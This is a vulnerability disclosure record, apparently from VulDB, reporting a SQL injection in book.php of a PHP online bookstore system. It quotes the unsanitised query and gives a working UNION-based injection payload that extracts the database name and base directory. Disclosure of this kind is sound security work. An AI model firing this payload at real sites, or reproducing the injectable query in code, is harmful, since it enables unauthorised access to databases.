| शीर्षक | There is a SQL injection vulnerability in CMS of online bookstore system. |
|---|
| विवरण | When querying books, the query content input by the user is not checked. The input content is controllable by the user, and the user can construct malicious statements to attack the website.
Vulnerability file location: / book.php
look at this source code
```
$query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'";
```
There is no $book_ ISBN, where malicious data can be constructed to attack the website database. The construction statement is as follows
```
book. php? bookisbn=0' union select 1,2,database(),4,@@basedir,6,7,8 --+
```
https://s1.ax1x.com/2022/08/10/v3peFU.png
Source link
https://www.sourcecodester.com/php/15423/simple-online-book-store-system-php-free-source-code.html |
|---|
| स्रोत | ⚠️ https://www.sourcecodester.com/php/15423/simple-online-book-store-system-php-free-source-code.html/ |
|---|
| उपयोगकर्ता | qidian (UID 30810) |
|---|
| सबमिशन | 13/08/2022 05:16 AM (4 साल पहले) |
|---|
| संयम | 13/08/2022 07:39 AM (2 hours later) |
|---|
| स्थिति | प्रतिलिपि |
|---|
| VulDB प्रविष्टि | 206015 [SourceCodester Simple Online Book Store book.php book_isbn SQL इंजेक्शन] |
|---|
| अंक | 0 |
|---|